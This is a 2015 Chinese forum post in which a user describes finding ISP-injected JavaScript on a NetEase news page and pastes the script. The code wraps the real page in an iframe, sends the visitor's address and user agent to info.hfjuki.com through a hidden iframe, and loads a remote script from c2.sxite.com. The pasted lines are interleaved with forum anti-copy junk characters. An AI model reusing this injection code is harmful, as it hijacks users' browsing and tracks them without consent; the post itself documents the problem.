|
本帖最后由 hudba 于 2015-2-3 00:56 编辑 - o6 Z2 B; l* T' C
% o. p7 p5 H) b p9 O2 `
上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
* H* n* x/ F; y1 H4 F) N8 U
: m: P2 q# D- x) U' t1 t* E接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}/ e N- e* l( `) y1 h; V
https://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197 . r8 N0 O7 \2 s% u9 J) c- U
8 H5 l' T* n m+ G8 v5 t顺便查下ip138:
* z! E* F# h( _5 M3 N2 K0 e* S0 a# |' v V5 ?. I
这是那段js里面的代码,好象是个半成品还没写入广告数据:
5 q/ r9 D" G0 Y$ r) q+ ^- function locationSearch() {
) E( w8 ?3 s4 S2 c8 g8 \) s - var s = getMainJs();
$ s; b% R9 n7 a: v+ O! R - if (s == null) {
; X, h+ b9 N" g, ]7 C$ Z2 | - location.reload();
: J2 h8 h8 V3 W% z - }# Q F1 d; w$ f/ B
- return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);, x9 c, W$ Y }4 }0 i$ l0 K( v8 E
- }
/ \" E9 T0 M p5 P( n - , h5 A! x. S8 h$ n
- function getParameter(name, paraStr) {7 e1 N- Y+ [' e- d# v7 ?1 o
- var result = "";7 z% y+ R+ }! r* U& u, D& `
- var str = "&" + paraStr.split("?")[1];
$ s" n8 l. K6 c, L( h - var paraName = "&" + name + "=";7 d4 e/ K+ N1 b" j) M
- if (str.indexOf(paraName) != -1) {
6 P" i9 c" G+ C+ g" g' D" V! D - if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {) U# S9 E- B& M, K2 s. n
- var TmpStr = str.substring(str.indexOf(paraName), str.length);) H& b& c9 Z7 }
- result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(0 n6 v6 _' b1 W, |$ V9 {- R
- 1, TmpStr.length).indexOf("&")
% I1 d; d" l8 ~- N - - TmpStr.indexOf(paraName) + 1);) \6 |( [$ }1 l' f) m: \9 ]
- } else {
% N6 k2 b, y6 j+ L% b1 Y" ~0 F - result = str.substring(str.indexOf(paraName), str.length);
( @4 O& N2 L: [( I - }. r; O3 E( U3 b/ m( S
9 ~3 A2 v) S# X" f2 J+ O. A- result = result.substring(result.indexOf("=") + 1, result.length);4 Z+ l+ m2 z8 p
- } else {- H& o( T* f$ ?) `
- result = "No such parameter";/ j" F4 w4 { C% n% `- m: E$ }& h
- }) R) C0 |' y. {
- return (result.replace("&", ""));
: X7 N+ p& ]3 Z8 P7 u* S - }0 }9 A% L/ _3 n9 e' E" W/ {
# h( ]% _1 h8 E2 l4 M! H: k- function getMainJs() {" q! R5 W' l: L7 c: F+ @
- var scripts = document.getElementsByTagName("script");
% @; _, ~, w3 U8 l - var s = null;
8 V1 u/ [$ F$ j! f - for (var i = 0; i < scripts.length; i++) {$ ~: R% _! b9 D$ O* Z" z. Z
- if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) {
+ @' ^4 w; E' H. v3 u8 Q3 v e - s = scripts[i];
7 |! s* @3 K$ P - break;
) H6 z& }; a2 ?3 o$ b - }$ {: L- ~ j7 ]# g/ h
- }
4 c+ H" r- o0 A) W2 \ - return s;# r# ] @( ]8 p# y# U* m# w
- } ^4 T8 e3 x9 T2 |5 x, n" x8 J
: |5 Z0 }3 Q) q5 U, z- function appendParam(oStr, aStr) {
3 }1 L7 _, A M# L& X3 |, L2 m - if (oStr.indexOf('?') > 0) {
! M8 C2 I! T" X' p - oStr = oStr + "&" + aStr;8 C" \! G& }% f/ `. }
- } else {6 r$ O6 N6 F! p) }5 e) K9 h! ?
- oStr = oStr + "?" + aStr;
( F; @/ a D& m0 Q! |) T# \3 s - }3 I, {- C& {5 t0 c0 P: `
- return oStr;
* Z9 ^ Z) w3 ~7 I0 a! J - }3 X0 |# O1 S! J- R( D% ^" c5 h, m, s
- * x/ I/ d3 |8 E/ ~
- window.onerror = function() {
+ Q! v( `' C$ E0 u8 _' z - };
6 q2 n" _! C6 L, F- V" S& V& e - |# S0 a1 x4 G# A& p% C
- var g_titleTime = 0;! b/ {+ ^% r: P6 u1 q9 a3 n
- function setTcTitle() {' @" L4 h9 {9 @
- if (undefined == document) {: `1 e4 F5 _( s( _. D5 H
- g_titleTime++;3 \5 N# w+ X) y% b' p3 O
- setTimeout("setTcTitle();", 1000);
2 n7 X1 [+ b3 s) d - return;
* }3 V8 Y8 J( K6 Z+ ~0 T - }
. W7 S: A# Z; ?. _+ K3 _ - + B1 t+ E5 K6 P; m7 D
- var doc;9 p# L+ }2 e5 i$ u* J
- try {
5 i1 o( s& A% m/ I. ^, J - if (document.all) { g. p* |8 {4 A$ I/ i& l! H3 T+ R
- doc = document.frames["cn"].document;( X$ Z" O9 t5 j" f5 d
- } else {
1 \1 z8 _" D3 [5 u6 w - doc = document.getElementById("cn").contentDocument;1 F& f! q* `4 n9 c, m
- }, o% d. f1 Z, X" v; k8 C. T1 K
- } catch (ex) {
3 B! k( ~) B. p: @0 ~- h9 ? - }. B7 f: L: B; m% ~/ v, F# d+ u t
0 W/ c7 y, w5 T6 H! _- a& j- if (g_titleTime < 5
6 B7 G& N+ _ ?# W! s8 ~9 I - && (undefined == doc || undefined == doc.title || "" == doc.title)) {
; `- R& W& z- \5 m: Q - g_titleTime++;- A1 ]2 d& l! C% C1 O
- setTimeout("setTcTitle();", 1000);6 i8 x# i \7 `+ ~
- return;9 L2 p- \6 p/ L) c7 c& ^1 H
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
; G0 @: d O' M+ M2 {% [& y - document.title = doc.title;
7 ]6 M V3 U* X3 X% a6 S - setTcAdvVisible();: v9 {; K" @( t& }% H
- }
% Z* m( x! C/ [' T% a. t/ C N - }) P1 l+ q; C) M( J0 q }$ N
- 6 ]0 J7 K3 c" z, M
- setTimeout("setTcTitle();", 1000);- p7 _. S5 {; [6 ?! G/ v) C3 ^
- ; |+ i- Z# W0 O, ~* ]
- var g_isHaveVisible = false;
) m a( ?+ d; L ]0 T - function setTcAdvVisible() {7 i: \1 W) S( `$ D' j. B8 g
- if (undefined != document && undefined != document.getElementById("addiv")
! M) I6 D0 p' x - && !g_isHaveVisible) {! a0 z4 C# m2 [) d" S, T
- document.getElementById("addiv").style.visibility = 'visible';7 A& \% h) C5 t1 x3 v/ `" ]2 H1 D# j) H
- document.getElementById("addiv").style.display = 'block';
# X" J* }, d8 p - g_isHaveVisible = true;# G7 t; O; l/ P7 ^2 G0 Y
- }0 z+ [! P) `! e, Y" v6 j6 e
- }
6 g5 x& ~0 y# u" q& W
8 f$ ]9 i6 a, ~) A" `4 O1 @- function UrlAnalyzer() {" O' b5 \( h9 T8 G3 n( S- _
- this.divda = "";
0 G1 m. z9 L9 l7 e3 y- a - this.tctype = "";
3 G7 Y! ?4 A7 _& e- ^) C' q - this.radius = "";' G7 E4 Y$ v g9 c( K. A+ l
- this.rlu = "";
$ |% M; ~6 ~% e8 A) L* k! Y - }" p2 J8 p0 c; ]4 j2 f
2 {, e9 X! y% L9 l- UrlAnalyzer.prototype.initParameters = function() {) U# R5 g0 e& h+ n; [5 v; ^
- var paraStr = locationSearch();* X! J5 K6 ~! @
- this.rlu = getParameter("lruedct", paraStr);
0 w) k; d2 I. ?1 b( g! L5 C - this.divda = getParameter("divda", paraStr);
3 q5 \0 n7 Z6 s9 w4 ], Y6 n - this.radius = getParameter("radius", paraStr);8 a1 o6 |) @% Y: z l
- this.tctype = getParameter("tctype", paraStr);3 p; G" d2 P( E+ T9 [' t- U
- this.address = getParameter("address", paraStr);
0 @! G& w# d6 H0 j - this.usagent = getParameter("usagent", paraStr);
8 a! Z1 \# [' c - }
. ]* A2 F# \1 X$ T. x
+ X w. H t( Z( q/ N. e% k- UrlAnalyzer.prototype.getHtmlDoc = function() {
! [7 R2 W1 s9 H$ J - var doc;8 y; d/ w8 [: b: Q8 f0 R" X
- try {4 _* b- b) \5 k) W# G$ T0 o V
- if (document.all) {
' C9 x4 [; w$ F' ^: ? - doc = document.frames["cn"].document;
! ^( Q8 z7 K6 m" S- E9 m# V8 ? - ; L: |8 R1 m/ u" |
- } else {# O$ W* Q- C6 b' B$ q: A+ |8 Q1 H+ V8 s
- doc = document.getElementById("cn").contentDocument;5 y4 v; V7 }( W9 d6 G& s
- // doc = document.getElementById("cn").contentWindow.document;! H: o) e" d+ |0 T0 t
- }9 Y% @/ V, h+ [* ?
- } catch (ex) {% G4 E5 b# Q7 s' j2 o
- }6 Y ~# v+ [: l. O( `2 T
- return doc;% e7 Q5 a/ f; W% u. b
- }0 l/ y, f" n' m1 X3 i
- 3 u# n& u" t" @$ q
- UrlAnalyzer.prototype.setDomain = function() {
) ]0 T' y3 g }8 s7 c. l - if (undefined != document.title && "" == document.title)
@. `* x$ W# L e# p - {& O& S& \" P, O
- var index = document.domain.indexOf(".");
1 d/ X. P) l) r7 @* o X# I1 _, d - if (undefined != index && -1 != index) {/ U9 Y/ p/ {6 O: H2 L" J2 C) X
- document.domain = document.domain.substring(index + 1,
+ h/ d8 ]3 ]: x" N3 k; t) k - document.domain.length);# s8 R& E7 X1 G) i
- }, m. P1 b1 a2 n& ^
-
: e4 a8 f0 R5 X! _0 H2 o$ }/ S - var doc = this.getHtmlDoc();6 j3 g9 J6 j( N- J* q
- if (undefined != doc && undefined != doc.title && "" != doc.title) {
0 o" ~+ P8 d( h2 y1 d! Z - document.title = doc.title;1 ^: ^9 I8 D# [1 y
- setTcAdvVisible();
# F' k# r1 E. }7 a - } w0 f3 b* V: q2 R9 v
- }
" L* Z; J6 R4 [$ B" e - }
! M4 a! P# A+ E% L/ y4 x5 ^# i6 m
8 y5 ?. p# z4 O, m8 ^3 l- F- UrlAnalyzer.prototype.iframeCallback = function() {
8 {1 ^& b! l; |4 [1 F" M' P! i& [9 w - var doc = this.getHtmlDoc();" z! q) W! ~/ F9 ~; i, e
- if (undefined == doc || undefined == doc.title || "" == doc.title) {
, g) r# {; ~1 a+ ^ - if (undefined != document.domain) {
* ]( C$ T6 `1 H
/ s8 u+ [0 Y8 P: T5 S) O5 t- var self = this;! ^2 J6 O( l; n1 `# ]4 U. ^
- setTimeout(function(){self.setDomain.call(self, null)}, 1000);, E. ? z( v. A* x
- // var index = document.domain.indexOf(".");9 q+ i9 g$ p; o' b: u! G2 c r' D, X% y
- // if (undefined != index && -1 != index) {
2 C* T& X/ J! G - // document.domain = document.domain.substring(index + 1,
M2 x' I6 H' y4 | - // document.domain.length);: S$ j3 p: s3 }9 k7 E4 t$ v
- // }
* g) t2 l( w% Y$ d# s5 z8 ]9 A - //
- L2 O+ |1 t( f/ P9 Z8 H6 n - // var doc = this.getHtmlDoc();# |6 g* Z. @. S7 T5 m
- // if (undefined != doc && undefined != doc.title && "" !=1 K9 r' l5 k0 K% t2 ], ^
- // doc.title) {( H# C+ p- w' X3 O; t& _
- // document.title = doc.title;3 o, a$ E0 u' O: W& D% ^
- // setTcAdvVisible();
; `3 K3 A z. _# @; l% M - // }
6 v; H" ]* ~& Y0 z& B - }
* f% o6 v% `6 g. o - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {. S% M3 d0 [, P4 Z( _, j
- document.title = doc.title;
6 w: W6 S) x2 H+ L - setTcAdvVisible();0 {. R+ ?( z9 D V
- }
1 M) y; n" X; j, f! v$ q# }. J - }/ R3 P$ |: j7 j
4 s% t7 T5 F+ c+ I- UrlAnalyzer.prototype.executeHtmlContext = function() {+ g. ?. U3 K& {& f" Q' J, r
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
2 m) |! u7 r0 q5 d5 C1 [" R - + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;
- e6 V/ }# X, L; m$ | R- ` - + M% _2 r" [: O @# {
- var htmlStr = "<iframe src="" + staUrl& V F' E' e0 X9 t5 h
- + "" style="display:none"></iframe>";
" R5 q# l4 e/ o - " J2 i; g. f! h9 K8 v) ?
- var advUrl = htmlStr( @& K2 t9 ?. o4 U' |8 E9 I7 @* d
- + "<script src="http://c2.sxite.com:8060/center?advId="& X1 c/ H. F3 p: `
- + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
; [0 O, b$ ]" u' }4 K - document.write(advUrl);
+ f* t: P' A; E$ b9 a+ L3 V j - 0 T3 z0 w0 O1 E: l3 X% m4 g
- var self = this;( q4 w/ j Y$ l- Y' \/ S5 J- @
- var iframe = document.getElementById("cn");
' a: q- {2 h W. C - if (iframe.attachEvent) {6 ?7 B, D$ d) D3 s
- iframe.attachEvent("onload", function() {$ F) m! N% l. J% i4 ~) Q. J- T. W' p
- self.iframeCallback.call(self, null);
, d4 S7 m" \0 U% a - });
. n& a! G/ a3 g* u6 ^- p) t3 d- o - } else {
4 g: Z3 h4 x0 I - iframe.onload = function() {: r7 Q8 @* Y2 N# i- \ N
- self.iframeCallback.call(self, null);
7 i/ D; T* X }1 g+ @ - }& ~; n3 K2 I7 \/ ]4 G
- }. P% B% A: j" j( T. F" u
- }
[7 _2 a3 g/ \ - & E$ C( _" D" H
- UrlAnalyzer.prototype.executeMain = function() {
5 ]1 q1 b% V% ^& ~! M - var mainFrame = document.getElementById("cn");( C3 z/ R6 Y9 D6 o9 S
- mainFrame.contentWindow.location.href = mainFrame.src;! I; \! d1 A# i5 d0 k
- this.initParameters();" G8 Y8 D; y2 [5 A! M
- this.executeHtmlContext(); M5 n- G! m6 R5 v' D
- }- `; G w( s1 h1 T8 B6 i1 @
- , a1 T+ Z% C$ k+ h$ ~9 a6 d
- var g_analyzer = new UrlAnalyzer();
, `# M0 R+ n3 n9 A4 k, y - g_analyzer.executeMain();
" q. c0 }# Y) x: q+ F8 ^& b
复制代码
% r7 N9 R* n+ T
. z: R0 c1 k1 G. `. s& B$ ^. p8 |; V o' e* x- j* G8 B$ `
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|